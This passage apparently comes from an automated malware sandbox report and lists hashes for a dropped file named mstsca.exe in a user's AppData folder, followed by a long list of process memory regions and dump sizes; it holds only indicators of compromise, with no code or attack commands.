                                                                882a96452e0073218ab82ebc8844281b

                                                                SHA1

                                                                e36ad67193b1e3175290d68284eea511d5bb2a17

                                                                SHA256

                                                                398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                                SHA512

                                                                e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                Filesize

                                                                9KB

                                                                MD5

                                                                9ead10c08e72ae41921191f8db39bc16

                                                                SHA1

                                                                abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                                                SHA256

                                                                8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                                                SHA512

                                                                aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                Filesize

                                                                9KB

                                                                MD5

                                                                9ead10c08e72ae41921191f8db39bc16

                                                                SHA1

                                                                abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                                                SHA256

                                                                8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                                                SHA512

                                                                aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                                              • memory/224-143-0x0000000000000000-mapping.dmp
                                                              • memory/376-244-0x0000000000000000-mapping.dmp
                                                              • memory/384-248-0x0000000000000000-mapping.dmp
                                                              • memory/392-136-0x0000000000000000-mapping.dmp
                                                              • memory/532-234-0x0000000000000000-mapping.dmp
                                                              • memory/748-198-0x0000000000000000-mapping.dmp
                                                              • memory/776-183-0x0000000000000000-mapping.dmp
                                                              • memory/1056-251-0x0000000000000000-mapping.dmp
                                                              • memory/1232-230-0x0000000000000000-mapping.dmp
                                                              • memory/1336-193-0x0000000000000000-mapping.dmp
                                                              • memory/1336-229-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                Filesize

                                                                1.2MB

                                                              • memory/1336-197-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                Filesize

                                                                1.2MB

                                                              • memory/1484-262-0x0000000000000000-mapping.dmp
                                                              • memory/1796-253-0x0000000000000000-mapping.dmp
                                                              • memory/1800-245-0x0000000000000000-mapping.dmp
                                                              • memory/1928-237-0x0000000000000000-mapping.dmp
                                                              • memory/1956-265-0x0000000000000000-mapping.dmp
                                                              • memory/1984-202-0x00000000005BE000-0x00000000005E7000-memory.dmp
                                                                Filesize

                                                                164KB

                                                              • memory/1984-204-0x00000000008E0000-0x0000000000927000-memory.dmp
                                                                Filesize

                                                                284KB

                                                              • memory/2108-255-0x0000000000000000-mapping.dmp
                                                              • memory/2380-186-0x0000000000000000-mapping.dmp
                                                              • memory/2540-271-0x0000000000400000-0x0000000000428000-memory.dmp
                                                                Filesize

                                                                160KB

                                                              • memory/2540-276-0x0000000001710000-0x0000000001722000-memory.dmp
                                                                Filesize

                                                                72KB

                                                              • memory/2540-274-0x00000000055B0000-0x0000000005BC8000-memory.dmp
                                                                Filesize

                                                                6.1MB

                                                              • memory/2540-275-0x00000000050A0000-0x00000000051AA000-memory.dmp
                                                                Filesize

                                                                1.0MB

                                                              • memory/2540-279-0x0000000006180000-0x0000000006724000-memory.dmp
                                                                Filesize

                                                                5.6MB

                                                              • memory/2540-282-0x0000000006AC0000-0x0000000006B36000-memory.dmp
                                                                Filesize

                                                                472KB

                                                              • memory/2540-277-0x0000000004FD0000-0x000000000500C000-memory.dmp
                                                                Filesize

                                                                240KB

                                                              • memory/2540-270-0x0000000000000000-mapping.dmp
                                                              • memory/2540-283-0x0000000006B40000-0x0000000006B90000-memory.dmp
                                                                Filesize

                                                                320KB

                                                              • memory/2540-281-0x0000000006E30000-0x000000000735C000-memory.dmp
                                                                Filesize

                                                                5.2MB

                                                              • memory/2540-278-0x0000000005390000-0x0000000005422000-memory.dmp
                                                                Filesize

                                                                584KB

                                                              • memory/2540-280-0x0000000006730000-0x00000000068F2000-memory.dmp
                                                                Filesize

                                                                1.8MB

                                                              • memory/2580-174-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                Filesize

                                                                1.2MB

                                                              • memory/2580-190-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                Filesize

                                                                1.2MB

                                                              • memory/2580-181-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                Filesize

                                                                1.2MB

                                                              • memory/2580-170-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                Filesize

                                                                1.2MB

                                                              • memory/2580-172-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                Filesize

                                                                1.2MB

                                                              • memory/2580-167-0x0000000000000000-mapping.dmp
                                                              • memory/2760-264-0x0000000000000000-mapping.dmp
                                                              • memory/2972-228-0x0000000000000000-mapping.dmp
                                                              • memory/3112-250-0x0000000000000000-mapping.dmp
                                                              • memory/3228-200-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                Filesize

                                                                364KB

                                                              • memory/3228-199-0x0000000000000000-mapping.dmp
                                                              • memory/3228-227-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                Filesize

                                                                364KB

                                                              • memory/3228-201-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                Filesize

                                                                364KB

                                                              • memory/3228-206-0x0000000061E00000-0x0000000061EF3000-memory.dmp
                                                                Filesize

                                                                972KB

                                                              • memory/3228-205-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                Filesize

                                                                364KB

                                                              • memory/3228-203-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                Filesize

                                                                364KB

                                                              • memory/3304-233-0x0000000000000000-mapping.dmp
                                                              • memory/3364-235-0x0000000000000000-mapping.dmp
                                                              • memory/3388-175-0x0000000002350000-0x000000000246B000-memory.dmp
                                                                Filesize

                                                                1.1MB

                                                              • memory/3388-139-0x0000000000000000-mapping.dmp
                                                              • memory/3388-173-0x000000000209A000-0x000000000212C000-memory.dmp
                                                                Filesize

                                                                584KB

                                                              • memory/3420-169-0x0000000000000000-mapping.dmp
                                                              • memory/3424-243-0x0000000000000000-mapping.dmp
                                                              • memory/3444-240-0x0000000000000000-mapping.dmp
                                                              • memory/3452-155-0x0000000000560000-0x00000000005CB000-memory.dmp
                                                                Filesize

                                                                428KB

                                                              • memory/3452-154-0x0000000000800000-0x0000000000875000-memory.dmp
                                                                Filesize

                                                                468KB

                                                              • memory/3452-158-0x0000000000560000-0x00000000005CB000-memory.dmp
                                                                Filesize

                                                                428KB

                                                              • memory/3452-152-0x0000000000000000-mapping.dmp
                                                              • memory/3484-184-0x0000000006260000-0x000000000627E000-memory.dmp
                                                                Filesize

                                                                120KB

                                                              • memory/3484-192-0x0000000006760000-0x000000000677A000-memory.dmp
                                                                Filesize

                                                                104KB

                                                              • memory/3484-163-0x0000000000000000-mapping.dmp
                                                              • memory/3484-164-0x0000000002CC0000-0x0000000002CF6000-memory.dmp
                                                                Filesize

                                                                216KB

                                                              • memory/3484-165-0x00000000054C0000-0x0000000005AE8000-memory.dmp
                                                                Filesize

                                                                6.2MB

                                                              • memory/3484-166-0x0000000005AF0000-0x0000000005B56000-memory.dmp
                                                                Filesize

                                                                408KB

                                                              • memory/3484-168-0x0000000005C60000-0x0000000005CC6000-memory.dmp
                                                                Filesize

                                                                408KB

                                                              • memory/3484-191-0x0000000007A90000-0x000000000810A000-memory.dmp
                                                                Filesize

                                                                6.5MB

                                                              • memory/3624-157-0x00000000005C0000-0x00000000005CC000-memory.dmp
                                                                Filesize

                                                                48KB

                                                              • memory/3624-156-0x0000000000000000-mapping.dmp
                                                              • memory/3628-236-0x0000000000000000-mapping.dmp
                                                              • memory/3640-268-0x0000000000000000-mapping.dmp
                                                              • memory/3752-226-0x0000000000000000-mapping.dmp
                                                              • memory/3888-267-0x0000000000000000-mapping.dmp
                                                              • memory/3908-252-0x0000000000000000-mapping.dmp
                                                              • memory/3908-177-0x0000000000000000-mapping.dmp
                                                              • memory/3932-257-0x0000000000000000-mapping.dmp
                                                              • memory/4020-239-0x0000000000000000-mapping.dmp
                                                              • memory/4032-231-0x0000000000000000-mapping.dmp
                                                              • memory/4148-260-0x0000000000000000-mapping.dmp
                                                              • memory/4160-196-0x0000000001FEA000-0x000000000207C000-memory.dmp
                                                                Filesize

                                                                584KB

                                                              • memory/4160-188-0x0000000000000000-mapping.dmp
                                                              • memory/4392-146-0x0000000000000000-mapping.dmp
                                                              • memory/4436-261-0x0000000000000000-mapping.dmp
                                                              • memory/4496-178-0x00000000032B0000-0x0000000003360000-memory.dmp
                                                                Filesize

                                                                704KB

                                                              • memory/4496-138-0x0000000000000000-mapping.dmp
                                                              • memory/4496-182-0x0000000003090000-0x00000000031D9000-memory.dmp
                                                                Filesize

                                                                1.3MB

                                                              • memory/4496-162-0x0000000003090000-0x00000000031D9000-memory.dmp
                                                                Filesize

                                                                1.3MB

                                                              • memory/4496-176-0x00000000031E0000-0x00000000032A6000-memory.dmp
                                                                Filesize

                                                                792KB

                                                              • memory/4496-160-0x0000000002DB0000-0x0000000002F3C000-memory.dmp
                                                                Filesize

                                                                1.5MB

                                                              • memory/4496-179-0x00000000032B0000-0x0000000003360000-memory.dmp
                                                                Filesize

                                                                704KB

                                                              • memory/4512-161-0x0000000000000000-mapping.dmp
                                                              • memory/4512-242-0x0000000000000000-mapping.dmp
                                                              • memory/4528-241-0x0000000000000000-mapping.dmp
                                                              • memory/4576-185-0x0000000000000000-mapping.dmp
                                                              • memory/4612-247-0x0000000000000000-mapping.dmp
                                                              • memory/4652-246-0x0000000000000000-mapping.dmp
                                                              • memory/4736-249-0x0000000000000000-mapping.dmp
                                                              • memory/4760-263-0x0000000000000000-mapping.dmp
                                                              • memory/4816-259-0x0000000000000000-mapping.dmp
                                                              • memory/4856-135-0x0000000000400000-0x0000000000581000-memory.dmp
                                                                Filesize

                                                                1.5MB

                                                              • memory/4856-133-0x0000000000710000-0x0000000000719000-memory.dmp
                                                                Filesize

                                                                36KB

                                                              • memory/4856-134-0x0000000000400000-0x0000000000581000-memory.dmp
                                                                Filesize

                                                                1.5MB

                                                              • memory/4856-132-0x000000000088D000-0x000000000089E000-memory.dmp
                                                                Filesize

                                                                68KB

                                                              • memory/4928-266-0x0000000000000000-mapping.dmp
                                                              • memory/4960-238-0x0000000000000000-mapping.dmp
                                                              • memory/4972-149-0x0000000000000000-mapping.dmp
                                                              • memory/4972-153-0x0000000000C40000-0x0000000000C48000-memory.dmp
                                                                Filesize

                                                                32KB

                                                              • memory/4972-159-0x0000000006060000-0x0000000006082000-memory.dmp
                                                                Filesize

                                                                136KB

                                                              • memory/5096-258-0x0000000000000000-mapping.dmp